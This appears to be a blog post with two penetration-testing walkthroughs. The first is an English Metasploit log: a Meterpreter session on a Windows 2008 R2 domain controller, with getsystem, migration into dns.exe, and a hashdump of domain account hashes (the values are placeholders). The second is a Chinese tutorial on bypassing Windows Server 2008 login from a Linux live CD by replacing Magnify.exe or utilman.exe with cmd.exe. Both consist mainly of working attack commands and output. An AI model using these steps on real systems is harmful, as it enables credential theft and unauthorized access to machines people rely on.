## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12622 updated today (2011.05.15)

msf >
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : DOMAINCONTROLLE
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x64 0
224 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
404 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
468 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
484 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
628 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
804 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
836 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
880 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
932 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
972 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
328 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1204 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
1252 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
1288 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
1316 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
1360 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1392 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1464 wlms.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wlms\wlms.exe
1492 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
1572 VMUpgradeHelper.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
1896 TPAutoConnSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2016 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
872 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1268 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2360 taskhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\taskhost.exe
2424 dwm.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\dwm.exe
2452 explorer.exe x64 1 SITTINGDUCK\juser C:\Windows\explorer.exe
2504 TPAutoConnect.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2512 conhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\conhost.exe
2632 VMwareTray.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2640 VMwareUser.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareUser.exe
2716 mmc.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\mmc.exe
3052 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
2216 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1932 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
2564 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1732 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2992 notepad.exe x86 1 SITTINGDUCK\juser C:\Windows\SysWOW64\notepad.exe
1720 notepad.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\notepad.exe

meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful ‘The parameter is incorrect’ error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but lets do a ‘getprivs’ just in case:

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be ‘SYSTEM’…

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing… Maybe it requires that we be in a 64 bit process… PID 1720 was 64 bit version of Notepad, lets try that…

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as ‘SYSTEM’…

meterpreter > getsystem ...got system (via technique 1).

meterpreter > hashdump

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a ‘SYSTEM’ process that was already there.. ‘dns.exe’ PID 1288 should be good…

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter >

相关文章

• 2010年01月22日 -- 绕过 Windows Server 2008的密码保护
• 2008年11月20日 -- Metasploit Framework 3.2 Released 最新版

虽然与早期版本相比非常安全，但它可以很容易地绕过密码保护进入主机。
在本文中，我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。

概念演示：
为了能够绕过密码保护，我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘（NTFS-3G是一个跨平台执行的Windows NTFS文件系统，支持读/写能力）。

我们首先检查哪个分区是Windows NTFS分区，在这个例子中是/dev/sd1。
fdisk –l | grep NTFS

然后，我们创建目录，将安装Windows文件：
mkdir –p /mnt/windows

因此，我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中：
mount –t ntfs-3g /dev/sda1/mnt/windows

现在，我们将一个可执行文件cmd.exe替换为Magnify.exe文件：
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe

然后在我们上面描述的过程中，我们重启机器并还原到Windows Server 2008。

正如下面所看到的，我们可以选择“Make items on the screen larger(Magnifier)”选项，并自动打开命令提示符窗口。



另一方法可用于Windows Vista操作系统和任何其他类似方式的系统，重命名“utilman.exe”为“cmd.exe”。

相关文章

• 2011年06月13日 -- Dumping Hashes on Win2008 R2 x64 with Metasploit